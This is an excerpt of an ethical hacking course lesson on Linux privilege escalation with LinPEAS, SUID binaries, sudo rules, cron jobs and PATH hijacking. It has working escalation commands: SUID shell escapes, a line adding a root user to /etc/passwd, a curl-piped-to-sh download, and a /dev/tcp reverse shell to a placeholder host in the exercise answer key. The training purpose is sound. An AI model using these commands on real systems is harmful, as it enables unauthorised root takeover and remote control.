π° Originally published on SecurityElites β the canonical, fully-updated version of this article.
π‘οΈ ETHICAL HACKING COURSE
FREE
Part of the 100-Day Ethical Hacking Course
Day 31 of 100 Β· 31% complete
β οΈ Authorised Lab Environments Only: Privilege escalation techniques must only be practised on systems you own or in explicitly authorised penetration testing engagements. Escalating privileges on any system without written authorisation is a criminal offence.
Linux Privilege Escalation in 2026 :β Initial access as www-data or a low-privilege service account is not the goal. Root is the goal. The gap between βwe have a low-privilege shellβ and βwe have rootβ is where the real penetration testing skill lives. Most Linux systems that are compromised at the service level are also compromised at the system level β because privilege escalation vectors are everywhere: a Python interpreter with the SUID bit set, a cron job running a writable script as root, a sudo rule that allows running an editor as root. This guide covers the four most common escalation vectors, LinPEAS for automated discovery, and the GTFOBins reference for exploiting every binary you find.
π― What Youβll Master in Day 31
Run LinPEAS and interpret colour-coded privilege escalation findings
Find and exploit SUID binaries using GTFOBins
Identify and exploit misconfigured sudo rules
Abuse writable cron job scripts to execute as root
Apply PATH hijacking to execute malicious binaries in root-run scripts
β±οΈ 50 min read Β· 3 exercises ### π Linux Privilege Escalation 2026 1. Enumeration First β LinPEAS and Manual Checks 2. SUID Binary Exploitation 3. Sudo Misconfiguration Exploitation 4. Cron Job Abuse 5. PATH Hijacking In Day 30 you established persistence mechanisms on Windows. Day 31 returns to a critical earlier phase: escalating from initial access to full system compromise on Linux. You cannot establish persistent access with real impact until you have root-level privileges β persistence and escalation always work together in the 100-Day Ethical Hacking Course.
Enumeration First β LinPEAS and Manual Checks
LINPEAS AND MANUAL ENUMERATIONCopy
Download and run LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
Save output for review
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh -o linpeas.sh
chmod +x linpeas.sh && ./linpeas.sh | tee /tmp/linpeas_out.txt
Manual quick checks β run these first without LinPEAS
whoami && id && hostname
sudo -l # What can current user run as root?
find / -perm -4000 -type f 2>/dev/null # SUID files
cat /etc/crontab && ls -la /etc/cron* # Cron jobs
cat /etc/passwd | grep -v nologin # Users with shell access
find / -writable -type f 2>/dev/null | grep -v proc # Writable files
uname -a && cat /etc/os-release # Kernel version for exploit search
ps aux | grep root # Root-owned processes
π§ EXERCISE 1 β THINK LIKE A HACKER (8 MIN Β· NO TOOLS)
Identify Privilege Escalation Vectors From a LinPEAS Output Snapshot
β±οΈ Time: 8 minutes Β· No tools required
You have run LinPEAS on a compromised server and received
these findings (colour-coded: RED=critical, YELLOW=interesting):
[RED] SUID files found: /usr/bin/python3.9 (owned by root) /usr/bin/find /usr/bin/nmap (version 5.21)
[RED] Sudo rules (sudo -l output): (root) NOPASSWD: /usr/bin/vim /var/www/html/config.php
[YELLOW] Cron jobs (running as root): */5 * * * * /opt/backup/run_backup.sh File permissions: -rwxrwxrwx (world-writable!)
[YELLOW] PATH-dependent script (owned by root, runs at login): /usr/local/bin/system-check Content: βping -c 1 localhostβ (uses relative path for ping) /usr/local/bin is in your PATH and is world-writable
For each finding: 1. Which escalation technique applies? 2. What is the exact command or payload? 3. How quickly would this give you root? 4. Which finding would you exploit FIRST? Why?
β Answer key: SUID Python β fastest: python3.9 -c βimport os; os.setuid(0); os.system(β/bin/bashβ)β β immediate root shell. SUID find β find . -exec /bin/sh \; β root shell. SUID nmap v5.21 β nmap βinteractive β !sh. Sudo vim β vim opens config.php, then :!/bin/bash in vim command mode β root shell. Cron world-writable β echo β#!/bin/bash\nbash -i >& /dev/tcp/YOUR_IP/4444 0>&1β > /opt/backup/run_backup.sh β wait up to 5 minutes for root reverse shell. PATH hijacking β create malicious βpingβ in /usr/local/bin β executed as root at next login. First choice: SUID Python β fastest, most reliable, immediate interactive root shell. The cron job is highest impact (guaranteed root) but requires waiting 5 minutes.
πΈ Share your prioritised exploitation plan in #day-31-privesc on Discord.
SUID Binary Exploitation
SUID EXPLOITATION β COMMON BINARIESCopy
Find all SUID binaries
find / -perm -4000 -type f 2>/dev/null
Then check each against GTFOBins: gtfobins.github.io
Common exploitable SUID binaries:
Python (if SUID)
python3 -c βimport os; os.setuid(0); os.system(β/bin/bashβ)β
Perl (if SUID)
perl -e βuse POSIX qw(setuid); POSIX::setuid(0); exec β/bin/bashβ;β
Find (if SUID)
find . -exec /bin/sh -p \; -quit
Vim (if SUID)
vim -c β:!/bin/bashβ
Bash (if SUID)
bash -p # -p flag preserves SUID privileges
cp (if SUID β write to /etc/passwd)
echo βpwned:$1$salt$hash:0:0:root:/root:/bin/bashβ >> /etc/passwd
After any escalation β confirm:
whoami && id
root
uid=0(root) gid=0(root) groups=0(root)
π Read the complete guide on SecurityElites
This article continues with deeper technical detail, screenshots, code samples, and an interactive lab walk-through. Read the full article on SecurityElites β
This article was originally written and published by the SecurityElites team. For more cybersecurity tutorials, ethical hacking guides, and CTF walk-throughs, visit SecurityElites.
Top comments (0)